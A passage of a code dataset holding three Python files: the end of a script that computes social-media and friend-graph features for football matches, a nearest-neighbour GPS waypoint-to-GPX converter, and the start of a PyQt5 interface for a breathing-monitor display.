fear = []\n happiness = []\n neutral = []\n sadness = []\n surprise = []\n\n for i in range(len(posts_df)):\n post_text = posts_df.get_value(i, 'text')\n text_lengths.append(len(post_text))\n\n post_likes = posts_df.get_value(i, 'likes')\n likes_numbers.append(post_likes['count'])\n\n post_reposts = posts_df.get_value(i, 'reposts')\n reposts_numbers.append(post_reposts['count'])\n\n features_df.set_value(games_counter, 'mean_text_length', np.mean(text_lengths))\n features_df.set_value(games_counter, 'mean_likes_number', np.mean(likes_numbers))\n features_df.set_value(games_counter, 'mean_reposts_number', np.mean(reposts_numbers))\n\n try:\n emotions_sets = posts_df[posts_df['emotions_set'].notnull()]['emotions_set'].get_values()\n except Exception:\n pass\n else:\n if len(emotions_sets) > 0:\n for each_emotions_sets_list in emotions_sets:\n for each_emotions_set in each_emotions_sets_list:\n anger.append(each_emotions_set['anger'])\n contempt.append(each_emotions_set['contempt'])\n disgust.append(each_emotions_set['disgust'])\n fear.append(each_emotions_set['fear'])\n happiness.append(each_emotions_set['happiness'])\n neutral.append(each_emotions_set['neutral'])\n sadness.append(each_emotions_set['sadness'])\n surprise.append(each_emotions_set['surprise'])\n\n features_df.set_value(games_counter, 'anger_median', np.median(anger))\n features_df.set_value(games_counter, 'contempt_median', np.median(contempt))\n features_df.set_value(games_counter, 'disgust_median', np.median(disgust))\n features_df.set_value(games_counter, 'fear_median', np.median(fear))\n features_df.set_value(games_counter, 'happiness_median', np.median(happiness))\n features_df.set_value(games_counter, 'neutral_median', np.median(neutral))\n features_df.set_value(games_counter, 'sadness_median', np.median(sadness))\n features_df.set_value(games_counter, 'surprise_median', np.median(surprise))\n\n users_collection = users_db[CLUBS_TRANSLIT[home_team] + '_' + match_date]\n\n visitors_ids = []\n all_visitors_friends = {}\n all_visitors_communties = {}\n\n mutual_friends_graph = nx.Graph()\n friends_among_visitors_graph = nx.Graph()\n mutual_communities_graph = nx.Graph()\n\n # graphs density\n cursor = users_collection.find()\n while cursor.alive:\n try:\n doc = cursor.next()\n except Exception:\n pass\n else:\n visitors_ids.append(doc['user_id'])\n all_visitors_friends[doc['user_id']] = doc['friends_ids']\n all_visitors_communties[doc['user_id']] = doc['communities_ids']\n\n mutual_friends_graph.add_nodes_from(visitors_ids)\n friends_among_visitors_graph.add_nodes_from(visitors_ids)\n mutual_communities_graph.add_nodes_from(visitors_ids)\n\n nodes_weights = {}\n processed_visitors = []\n\n for visitor_id in visitors_ids:\n processed_visitors.append(visitor_id)\n current_user_friends = set(all_visitors_friends[visitor_id])\n current_user_communities = set(all_visitors_communties[visitor_id])\n nodes_weights[visitor_id] = len(current_user_friends)\n other_visitors = set([x for x in visitors_ids if x not in processed_visitors])\n current_user_friends_among_visitors = list(current_user_friends & other_visitors)\n if len(current_user_friends_among_visitors) != 0:\n for each_friend_id in current_user_friends_among_visitors:\n friends_among_visitors_graph.add_edge(visitor_id, each_friend_id)\n\n for each_other_visitor in other_visitors:\n other_visitor_communities = set(all_visitors_communties[each_other_visitor])\n mutual_communities = list(current_user_communities & other_visitor_communities)\n mutual_communities_length = 
len(mutual_communities)\n                if mutual_communities_length > 0:\n                    mutual_communities_graph.add_edge(visitor_id, each_other_visitor,\n                                                      weight=mutual_communities_length)\n\n                other_visitor_friends = set(all_visitors_friends[each_other_visitor])\n                mutual_friends = list(current_user_friends & other_visitor_friends)\n                mutual_friends_length = len(mutual_friends)\n                if mutual_friends_length > 0:\n                    mutual_friends_graph.add_edge(visitor_id, each_other_visitor, weight=mutual_friends_length)\n\n        nx.set_node_attributes(mutual_friends_graph, 'weight', nodes_weights)\n\n        features_df.set_value(games_counter, 'mutual_friends_graph_density', nx.density(mutual_friends_graph))\n        features_df.set_value(games_counter, 'mutual_communities_graph_density',\n                              nx.density(mutual_communities_graph))\n        features_df.set_value(games_counter, 'friends_among_visitors_graph_density',\n                              nx.density(friends_among_visitors_graph))\n\n    features_df = features_df.dropna(axis=0).reset_index(drop=True)\n    print(features_df.columns)\n    input()\n    features_df.to_csv('/media/vasiliy/01D266BF62940460/Linux/football_research/output_data/online_features.csv', sep=';')\n\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"Features/PrepareOnlineFeaturesTable.py","file_name":"PrepareOnlineFeaturesTable.py","file_ext":"py","file_size_in_byte":9719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"168944926","text":"import datetime\n\ndef calDis(cor1, cor2):\n    dis = (cor1[0]-cor2[0])**2 + (cor1[1]-cor2[1])**2\n    return dis\n\nif __name__=='__main__':\n    corList = set()\n    inFile = open('ttt')\n    outFile = open('my.gpx','w')\n    outFile2 = open('trkpt.gpx','w')\n    outFile3 = open('gen.gpx','w')\n    outFile.write('<?xml version=\"1.0\"?>\\n<gpx>\\n')\n    idx = 1\n    curLat = 0\n    curLon = 0\n    for lines in inFile:\n        tmp = lines.strip().split(',')\n        lat = float(tmp[0])\n        lon = float(tmp[1])\n        if idx == 1:\n            curLat = lat\n            curLon = lon\n            idx = 0\n        else:\n            corList.add((lat, lon))\n    inFile.close()\n\n    idx = 1\n    now = datetime.datetime.now()\n    while len(corList) >= 1:\n        minDis = float('inf')\n        for cor in corList:\n            dis = calDis((curLat, curLon), cor)\n            if dis < minDis:\n                targetCor = cor\n                minDis = dis\n        curLat = targetCor[0]\n        curLon = targetCor[1]\n        corList.remove((targetCor))\n        outFile.write('<wpt lat=\"%s\" lon=\"%s\">\\n\\t<name>WP%03d</name>\\n\\t<time>%s</time>\\n</wpt>\\n' %(curLat, curLon, idx, now.strftime('%Y-%m-%dT%H:%M:%SZ')) )\n        outFile2.write('<trkpt lat=\"%s\" lon=\"%s\"></trkpt>\\n' % (curLat, curLon) )\n        idx+=1\n        delta = minDis*10000000\n        outFile3.write('gps setlatitude %s\\ngps setlongitude %s\\ngps setaltitude 0\\ngps setbearing 0\\npause %d\\n' % (curLat, curLon, delta))\n        if delta < 1:\n            delta = 1\n        now = now + datetime.timedelta(seconds=delta)\n    outFile.write('</gpx>')\n    outFile.close()\n    outFile2.close()\n    outFile3.close()\n\n","sub_path":"dis.py","file_name":"dis.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"37578162","text":"from PyQt5 import Qt, QtCore, QtGui, QtWidgets\r\nfrom pyqtgraph import PlotWidget, plot\r\nimport pyqtgraph as pg\r\nimport sys\r\nimport os\r\nimport serial\r\nfrom serial import SerialException\r\nimport time\r\nfrom random import randint\r\nfrom PyQt5.Qt import QColor, QDate, QTime\r\nfrom functools import partial\r\nimport datetime\r\nfrom statistics import mean\r\nimport csv\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n    \r\n    def setupUi(self, MainWindow):\r\n        MainWindow.setObjectName(\"MainWindow\")\r\n        MainWindow.resize(2629, 1262)\r\n\r\n        self.setupSerial()\r\n        self.setupDataAcq()\r\n        
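# Set up the main window's colour palette before the child widgets are created.\r\n        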
self.setupPalette(MainWindow)\r\n\r\n self.centralWidget = QtWidgets.QWidget(MainWindow)\r\n self.centralWidget.setObjectName(\"centralWidget\")\r\n self.centralWidget_VL = QtWidgets.QVBoxLayout(\r\n self.centralWidget)\r\n self.centralWidget_VL.setObjectName(\"centralWidget_VL\")\r\n\r\n self.setupStats()\r\n self.setupGraph1()\r\n self.setupGraph2()\r\n self.setupGraph3()\r\n self.setupDataTimer()\r\n self.setupBreathingTimer()\r\n self.setupClockRecordingTimer()\r\n\r\n MainWindow.setCentralWidget(self.centralWidget)\r\n self.menubar = QtWidgets.QMenuBar(MainWindow)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 2629, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n MainWindow.setMenuBar(self.menubar)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n ### SETUP UI SUBMETHODS ###\r\n\r\n def setupPalette(self, MainWindow):\r\n\r\n palette = QtGui.QPalette()\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.WindowText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(31, 142, 250))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.Button, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.Text, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.ButtonText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.Base, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(22, 34, 60))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.Window, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.PlaceholderText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.WindowText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(31, 142, 250))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.Button, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.Text, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.ButtonText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.Base, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(22, 34, 60))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.Window, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n 
QtGui.QPalette.PlaceholderText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.WindowText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(31, 142, 250))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.Button, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.Text, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.ButtonText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(22, 34, 60))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.Base, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(22, 34, 60))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.Window, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.PlaceholderText, brush)\r\n MainWindow.setPalette(palette)\r\n\r\n def setupStats(self):\r\n self.stat_widget = QtWidgets.QWidget(self.centralWidget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_widget.sizePolicy().hasHeightForWidth())\r\n self.stat_widget.setSizePolicy(sizePolicy)\r\n self.stat_widget.setObjectName(\"stat_widget\")\r\n self.stat_widget_HL = QtWidgets.QHBoxLayout(self.stat_widget)\r\n self.stat_widget_HL.setObjectName(\"stat_widget_HL\")\r\n spacerItem = QtWidgets.QSpacerItem(\r\n 40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_widget_HL.addItem(spacerItem)\r\n \r\n # self.stat_window = QtWidgets.QWidget(self.stat_widget)\r\n # self.stat_window.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n # \"color: rgb(255, 255, 255);\\n\"\r\n # \"border-radius: 16px;\")\r\n # self.stat_window.setObjectName(\"stat_window\")\r\n # self.stat_window_HL = QtWidgets.QHBoxLayout(self.stat_window)\r\n # self.stat_window_HL.setObjectName(\"stat_window_HL\")\r\n \r\n self.stat_window = QtWidgets.QWidget(self.stat_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_window.sizePolicy().hasHeightForWidth())\r\n self.stat_window.setSizePolicy(sizePolicy)\r\n self.stat_window.setMinimumSize(QtCore.QSize(1200, 0))\r\n self.stat_window.setMaximumSize(QtCore.QSize(1200, 16777215))\r\n self.stat_window.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.stat_window.setObjectName(\"stat_window\")\r\n self.stat_window_HL = QtWidgets.QHBoxLayout(self.stat_window)\r\n self.stat_window_HL.setObjectName(\"stat_window_HL\")\r\n spacerItem1 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_window_HL.addItem(spacerItem1)\r\n \r\n self.stat_col0 = QtWidgets.QWidget(self.stat_window)\r\n sizePolicy = 
QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col0.sizePolicy().hasHeightForWidth())\r\n self.stat_col0.setSizePolicy(sizePolicy)\r\n self.stat_col0.setObjectName(\"stat_col0\")\r\n self.stat_col0_VL = QtWidgets.QVBoxLayout(self.stat_col0)\r\n self.stat_col0_VL.setObjectName(\"stat_col0_VL\")\r\n self.ITV_value = QtWidgets.QLabel(self.stat_col0)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.ITV_value.sizePolicy().hasHeightForWidth())\r\n self.ITV_value.setSizePolicy(sizePolicy)\r\n self.ITV_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.ITV_value.setFont(font)\r\n self.ITV_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.ITV_value.setObjectName(\"ITV_value\")\r\n self.stat_col0_VL.addWidget(self.ITV_value)\r\n self.ITV_label = QtWidgets.QLabel(self.stat_col0)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.ITV_label.sizePolicy().hasHeightForWidth())\r\n self.ITV_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.ITV_label.setFont(font)\r\n self.ITV_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.ITV_label.setObjectName(\"ITV_label\")\r\n self.stat_col0_VL.addWidget(self.ITV_label)\r\n self.stat_col0_sub = QtWidgets.QWidget(self.stat_col0)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col0_sub.sizePolicy().hasHeightForWidth())\r\n self.stat_col0_sub.setSizePolicy(sizePolicy)\r\n self.stat_col0_sub.setObjectName(\"stat_col0_sub\")\r\n self.stat_col0_sub_GL = QtWidgets.QGridLayout(self.stat_col0_sub)\r\n self.stat_col0_sub_GL.setObjectName(\"stat_col0_sub_GL\")\r\n self.E2I_button_pos = QtWidgets.QPushButton(self.stat_col0_sub)\r\n self.E2I_button_pos.setEnabled(True)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.E2I_button_pos.sizePolicy().hasHeightForWidth())\r\n self.E2I_button_pos.setSizePolicy(sizePolicy)\r\n self.E2I_button_pos.setMinimumSize(QtCore.QSize(40, 40))\r\n self.E2I_button_pos.setMaximumSize(QtCore.QSize(40, 40))\r\n self.E2I_button_pos.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\\n\"\r\n \"\")\r\n self.E2I_button_pos.setObjectName(\"E2I_button_pos\")\r\n self.E2I_button_pos.clicked.connect(\r\n partial(self.E2I_button_clicked, True))\r\n\r\n self.stat_col0_sub_GL.addWidget(self.E2I_button_pos, 0, 2, 1, 1)\r\n self.E2I_label = QtWidgets.QLabel(self.stat_col0_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n 
QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.E2I_label.sizePolicy().hasHeightForWidth())\r\n self.E2I_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.E2I_label.setFont(font)\r\n self.E2I_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.E2I_label.setObjectName(\"E2I_label\")\r\n self.stat_col0_sub_GL.addWidget(self.E2I_label, 1, 0, 1, 3)\r\n self.E2I_value = QtWidgets.QLabel(self.stat_col0_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.E2I_value.sizePolicy().hasHeightForWidth())\r\n self.E2I_value.setSizePolicy(sizePolicy)\r\n self.E2I_value.setMaximumSize(QtCore.QSize(16777215, 60))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(40)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.E2I_value.setFont(font)\r\n self.E2I_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.E2I_value.setObjectName(\"E2I_value\")\r\n self.stat_col0_sub_GL.addWidget(self.E2I_value, 0, 1, 1, 1)\r\n self.E2I_button_neg = QtWidgets.QPushButton(self.stat_col0_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.E2I_button_neg.sizePolicy().hasHeightForWidth())\r\n self.E2I_button_neg.setSizePolicy(sizePolicy)\r\n self.E2I_button_neg.setMinimumSize(QtCore.QSize(40, 40))\r\n self.E2I_button_neg.setMaximumSize(QtCore.QSize(40, 40))\r\n self.E2I_button_neg.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.E2I_button_neg.setObjectName(\"E2I_button_neg\")\r\n self.E2I_button_neg.clicked.connect(\r\n partial(self.E2I_button_clicked, False))\r\n self.stat_col0_sub_GL.addWidget(self.E2I_button_neg, 0, 0, 1, 1)\r\n self.stat_col0_VL.addWidget(self.stat_col0_sub)\r\n self.stat_window_HL.addWidget(self.stat_col0)\r\n spacerItem2 = QtWidgets.QSpacerItem(\r\n 12, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_window_HL.addItem(spacerItem2)\r\n self.stat_col1 = QtWidgets.QWidget(self.stat_window)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col1.sizePolicy().hasHeightForWidth())\r\n self.stat_col1.setSizePolicy(sizePolicy)\r\n self.stat_col1.setObjectName(\"stat_col1\")\r\n self.stat_col1_VL = QtWidgets.QVBoxLayout(self.stat_col1)\r\n self.stat_col1_VL.setObjectName(\"stat_col1_VL\")\r\n self.ETV_value = QtWidgets.QLabel(self.stat_col1)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.ETV_value.sizePolicy().hasHeightForWidth())\r\n self.ETV_value.setSizePolicy(sizePolicy)\r\n self.ETV_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = 
QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.ETV_value.setFont(font)\r\n self.ETV_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.ETV_value.setObjectName(\"ETV_value\")\r\n self.stat_col1_VL.addWidget(self.ETV_value)\r\n self.ETV_label = QtWidgets.QLabel(self.stat_col1)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.ETV_label.sizePolicy().hasHeightForWidth())\r\n self.ETV_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.ETV_label.setFont(font)\r\n self.ETV_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.ETV_label.setObjectName(\"ETV_label\")\r\n self.stat_col1_VL.addWidget(self.ETV_label)\r\n self.stat_col1_sub = QtWidgets.QWidget(self.stat_col1)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col1_sub.sizePolicy().hasHeightForWidth())\r\n self.stat_col1_sub.setSizePolicy(sizePolicy)\r\n self.stat_col1_sub.setObjectName(\"stat_col1_sub\")\r\n self.stat_col1_sub_GL = QtWidgets.QGridLayout(self.stat_col1_sub)\r\n self.stat_col1_sub_GL.setObjectName(\"stat_col1_sub_GL\")\r\n self.RR_value = QtWidgets.QLabel(self.stat_col1_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.RR_value.sizePolicy().hasHeightForWidth())\r\n self.RR_value.setSizePolicy(sizePolicy)\r\n self.RR_value.setMaximumSize(QtCore.QSize(16777215, 60))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(40)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.RR_value.setFont(font)\r\n self.RR_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.RR_value.setObjectName(\"RR_value\")\r\n self.stat_col1_sub_GL.addWidget(self.RR_value, 0, 1, 1, 1)\r\n self.RR_button_neg = QtWidgets.QPushButton(self.stat_col1_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.RR_button_neg.sizePolicy().hasHeightForWidth())\r\n self.RR_button_neg.setSizePolicy(sizePolicy)\r\n self.RR_button_neg.setMinimumSize(QtCore.QSize(40, 40))\r\n self.RR_button_neg.setMaximumSize(QtCore.QSize(40, 40))\r\n self.RR_button_neg.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.RR_button_neg.setObjectName(\"RR_button_neg\")\r\n self.RR_button_neg.clicked.connect(\r\n partial(self.RR_button_clicked, False))\r\n self.stat_col1_sub_GL.addWidget(self.RR_button_neg, 0, 0, 1, 1)\r\n self.RR_button_pos = QtWidgets.QPushButton(self.stat_col1_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n 
self.RR_button_pos.sizePolicy().hasHeightForWidth())\r\n self.RR_button_pos.setSizePolicy(sizePolicy)\r\n self.RR_button_pos.setMinimumSize(QtCore.QSize(40, 40))\r\n self.RR_button_pos.setMaximumSize(QtCore.QSize(40, 40))\r\n self.RR_button_pos.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.RR_button_pos.setObjectName(\"RR_button_pos\")\r\n self.RR_button_pos.clicked.connect(\r\n partial(self.RR_button_clicked, True))\r\n self.stat_col1_sub_GL.addWidget(self.RR_button_pos, 0, 2, 1, 1)\r\n self.RR_label = QtWidgets.QLabel(self.stat_col1_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.RR_label.sizePolicy().hasHeightForWidth())\r\n self.RR_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.RR_label.setFont(font)\r\n self.RR_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.RR_label.setObjectName(\"RR_label\")\r\n self.stat_col1_sub_GL.addWidget(self.RR_label, 1, 0, 1, 3)\r\n self.stat_col1_VL.addWidget(self.stat_col1_sub)\r\n self.stat_window_HL.addWidget(self.stat_col1)\r\n spacerItem3 = QtWidgets.QSpacerItem(\r\n 12, 20, 